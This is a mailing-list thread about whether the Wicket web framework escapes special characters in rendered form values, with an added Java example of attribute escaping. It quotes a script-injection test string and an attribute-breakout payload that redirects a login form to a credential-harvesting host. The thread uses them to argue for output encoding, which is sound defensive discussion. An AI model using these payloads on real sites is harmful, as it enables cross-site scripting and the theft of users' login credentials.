Johan Compagner wrote:

So when I have this:

x = 6 < 7 & 10 > 5

as text in my model it gets encoded into HTML? (And that's what I see?)
That is something I don't want.

No, I think this would be the right thing to do:
the value of the model is x = 6 < 7 & 10 > 5
but as soon as wicket renders the page and the value of the input field that the model is attached to,
it should render the value as x = 6 &lt; 7 &amp; 10 &gt; 5
so that the html source will read

<input type="text" value="x = 6 &lt; 7 &amp; 10 &gt; 5">
instead of
<input type="text" value="x = 6 < 7 & 10 > 5">

special chars should only be RENDERED as html entities, not saved as html entities in the model.


The problem you describe is, I think, the " at the beginning that makes it all possible,

(else it was just a text value of the value attribute)

the " makes it possible to break out of the value parameter of the input field. That could pose a security risk, though. Imagine this: You have a login form that saves the username in case the login failed and the page is reloaded.
Some malicious person opens the login page and enters this:

" onChange=document.form[0].action='http://loginAndPasswordHarvester.com' dummy="

He sends off the form, it gets reloaded because the "login" is invalid, and he leaves the terminal for someone else to log in. When someone else tries to log in, their username and password get sent to a different server.

So I guess rendering special characters as html entities might be a good idea.

Cheers,

Johannes.





johan
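Added example (not Wicket's own code) of the rendering rule argued for above: the model keeps the raw string, and only the value written into the tag's attribute is entity-encoded. The class and method names are made up for the illustration; the two sample strings are the ones quoted in this thread, constructed here as inline input.

```java
public class AttributeEscapeDemo {

    // Escape the characters that can end or alter a double-quoted HTML attribute.
    // The model value itself is never modified; only the rendered output is.
    static String escapeAttribute(String raw) {
        StringBuilder sb = new StringBuilder(raw.length() + 16);
        for (int i = 0; i < raw.length(); i++) {
            char c = raw.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Render the text field the way the thread proposes: escape at render time only.
    static String renderTextField(String modelValue) {
        return "<input type=\"text\" value=\"" + escapeAttribute(modelValue) + "\">";
    }

    public static void main(String[] args) {
        // Constructed samples taken from the thread: a harmless formula and the
        // quote-led string that would otherwise break out of the value attribute.
        String[] samples = {
            "x = 6 < 7 & 10 > 5",
            "\" onChange=document.form[0].action='http://loginAndPasswordHarvester.com' dummy=\""
        };
        for (String model : samples) {
            System.out.println("model : " + model);
            System.out.println("render: " + renderTextField(model));
        }
    }
}
```

With the leading quote rendered as &quot;, the second sample stays inside the value attribute as plain text rather than adding an onChange handler to the field.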


On 11/24/05, *Johannes Fahrenkrug* <[EMAIL PROTECTED]> wrote:

    Hi,

    I have built several forms using Wicket. Just out of curiosity I
    tried
    to enter the following line into a text field:

    "><script>alert('Soylent Green Is People');</script test="

    When I reload the form, the JavaScript code gets executed. Shouldn't
    such special characters be converted to HTML entities when the
    page gets
    parsed? (You know &lt; instead of < and so forth)

    Cheers,

    Johannes.


    -------------------------------------------------------
    This SF.net email is sponsored by: Splunk Inc. Do you grep through
    log files
    for problems?  Stop!  Download the new AJAX search engine that makes
    searching your log files as easy as surfing the  web.  DOWNLOAD
    SPLUNK!
    http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click
    <http://ads.osdn.com/?ad_id=7637&alloc_id=16865&op=click>
    _______________________________________________
    Wicket-user mailing list
    [email protected]
    <mailto:[email protected]>
    https://lists.sourceforge.net/lists/listinfo/wicket-user
